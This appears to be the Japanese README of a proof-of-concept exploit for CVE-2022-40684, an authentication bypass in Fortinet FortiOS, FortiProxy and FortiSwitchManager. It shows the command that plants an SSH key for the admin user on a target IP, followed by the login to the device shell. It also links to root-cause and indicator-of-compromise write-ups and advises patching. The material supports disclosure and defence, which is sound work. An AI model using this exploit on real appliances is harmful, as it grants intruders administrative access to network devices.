
Fortinet FortiOS、FortiProxy、およびFortiSwitchManagerに影響するCVE-2022-40684の概念実証エクスプロイト
Fortinet FortiOS、FortiProxy、FortiSwitchManager アプライアンスに影響を与える CVE-2022-40684 の POC
本脆弱性の技術的根本原因分析は、私たちのブログでご覧いただけます: https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684
Fortinet ログを分析して侵害指標を特定し、詳細なログを有効にする方法については、IoCブログをご覧ください: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/
この POC は、認証バイパスの脆弱性を悪用して、指定されたユーザーに SSH キーを設定します。
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh [email protected]
fortios_7_2_1 #
config Configure object.
get Get dynamic and system information.
show Show configuration.
diagnose Diagnose facility.
execute Execute static commands.
alias Execute alias commands.
exit Exit the CLI.
最新バージョンにアップデートするか、Fortinet PSIRT 内の指示に従って緩和してください。
本ソフトウェアは、学術研究と効果的な防御技術の開発を唯一の目的として作成されており、明示的に許可された場合を除き、システムへの攻撃に使用することを意図していません。プロジェクトのメンテナーは、本ソフトウェアの誤用に関して一切の責任を負いません。責任を持って使用してください。